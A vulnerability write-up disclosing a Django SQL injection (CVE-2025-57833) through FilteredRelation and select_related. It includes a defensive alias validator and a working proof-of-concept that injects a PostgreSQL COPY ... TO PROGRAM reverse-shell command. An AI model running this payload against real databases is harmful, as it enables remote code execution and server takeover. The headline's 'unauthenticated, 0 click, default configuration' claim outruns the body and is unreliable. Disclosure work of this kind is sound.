Django Unauthenticated, 0 click, RCE, and SQL Injection using default configuration.
A critical vulnerability, CVE-2025-57833, was found in Django that allows attackers to achieve remote code execution through PostgreSQL and SQL injection on all databases. The flaw stems from malicious SQL queries constructed through the `FilteredRelation` and `select_related` functions. Attackers can use PostgreSQL's `COPY` and `PROGRAM` features to run a reverse shell and gain control. 2025-9-5 05:43:11 Author: infosecwriteups.com

EyalSec

Article about the critical CVE-2025-57833 I found in Django.


Impact:

RCE on PostgreSQL and SQL Injection on all of the databases.

Vulnerable code:

Vulnerability detection:

To be vulnerable, your code must use the `FilteredRelation` function together with `select_related`, as in the code above. An attacker who controls the alias passed to `FilteredRelation` and to `select_related`, as shown above, is able to exploit the vulnerability.
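A defender-side check, added here as an example and not part of the original article or of Django itself: a request-supplied value should only be accepted as a `FilteredRelation` alias (and hence as a `select_related` argument) if it is a bare identifier on an allow-list. The allow-list and the sample request values below are constructed for illustration.

```python
import keyword
import re

# Assumption for this example: the aliases a view may legitimately expose.
ALLOWED_RELATION_ALIASES = frozenset({"author_join", "publisher_join"})

# A bare SQL identifier: letters, digits and underscores, not starting with a digit.
_BARE_IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def validate_relation_alias(alias, allowed=ALLOWED_RELATION_ALIASES):
    """Return `alias` unchanged if it is a bare identifier on the allow-list.

    The alias is spliced into SQL by the FilteredRelation / select_related path,
    so quotes, whitespace, semicolons and comment markers must never get through.
    Raises ValueError with a short reason (the full value is not echoed back).
    """
    if not isinstance(alias, str) or not alias:
        raise ValueError("relation alias must be a non-empty string")
    if len(alias) > 63:  # PostgreSQL identifier limit (NAMEDATALEN - 1)
        raise ValueError("relation alias too long")
    if not _BARE_IDENTIFIER.fullmatch(alias) or keyword.iskeyword(alias):
        raise ValueError("relation alias is not a bare identifier")
    if alias not in allowed:
        raise ValueError("relation alias is not on the allow-list")
    return alias


def partition_aliases(raw_aliases, allowed=ALLOWED_RELATION_ALIASES):
    """Split request-supplied aliases into (accepted, rejected) lists.

    Each rejected entry is (first 20 chars, reason): enough to log and alert on
    an injection attempt without reproducing the whole payload in the log.
    """
    accepted, rejected = [], []
    for raw in raw_aliases:
        try:
            accepted.append(validate_relation_alias(raw, allowed))
        except ValueError as exc:
            rejected.append((str(raw)[:20], str(exc)))
    return accepted, rejected


# Constructed sample input: two benign aliases and one shaped like the article's
# payload (quoted column, FROM clause, statement separator, trailing comment).
SAMPLE_REQUEST_ALIASES = [
    "author_join",
    "publisher_join",
    'author_join."id" FROM "filtered_relation_book"; -- ',
]

if __name__ == "__main__":
    print(partition_aliases(SAMPLE_REQUEST_ALIASES))
```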

Exploit:

The `select_related` argument is the one that reaches the SQL query; however, Django checks in the code above that the first `user_data` and the second `user_data` are the same. The code above therefore does not work because of the + "e".

Obtain RCE:

The code below uses PostgreSQL's `COPY` and `PROGRAM` to execute a reverse shell:

```python
from django.db.models import FilteredRelation

# Assumed: Book is the model from Django's filtered_relation test app
# (its table is "filtered_relation_book", as the payload below shows).
from .models import Book


def test_select_related_foreign_key_sqli(self):
    # The same string is used as the FilteredRelation alias and as the
    # select_related() argument, so Django's equality check passes and the
    # whole value is spliced verbatim into the generated SQL.
    user_data = 'author_join."id", author_join."name", author_join."content_type_id", author_join."object_id" FROM "filtered_relation_book" INNER JOIN "filtered_relation_author" author_join ON ("filtered_relation_book"."author_id" = author_join."id") ; COPY (SELECT \'\') TO PROGRAM \'bash -i >& /dev/tcp/127.0.0.1/1025 0>&1\'; -- '

    qs = (
        Book.objects.annotate(**{
            user_data: FilteredRelation("author"),
        })
        .select_related(user_data)
    )

    # Forces evaluation, which sends the crafted query to PostgreSQL.
    qs._fetch_all()
```

Proof of Concept (PoC): [screenshot in the original article, not reproduced here]

EyalSec CVEs:

https://github.com/EyalSec/EyalSec_CVE/

If you have any questions or you want to collaborate with me, you can email me at: [email protected]


Source: https://infosecwriteups.com/django-unauthenticated-0-click-rce-and-sql-injection-using-default-configuration-059964f3f898?source=rss----7b722bfd1b8d--bug_bounty